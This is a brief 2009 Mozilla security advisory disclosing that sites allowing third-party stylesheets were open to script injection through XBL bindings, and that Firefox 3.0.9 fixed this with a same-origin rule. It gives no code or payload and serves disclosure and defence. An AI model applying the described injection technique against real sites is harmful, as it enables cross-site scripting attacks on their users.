Mozilla Foundation Security Advisory 2009-18
Title: XSS hazard using third-party stylesheets and XBL bindings
Announced: April 21, 2009
Reporter: Cefn Hoile
Products: Firefox, Thunderbird, SeaMonkey
Fixed in: Firefox 3.0.9
Web developer Cefn Hoile reported that sites which allow users to embed third-party stylesheets are vulnerable to script injection attacks using XBL bindings. While this behavior was documented previously, it was determined that this particular risk was not well-understood by some websites. To mitigate this risk Mozilla added a restriction that requires XBL bindings to come from the same origin as the bound document.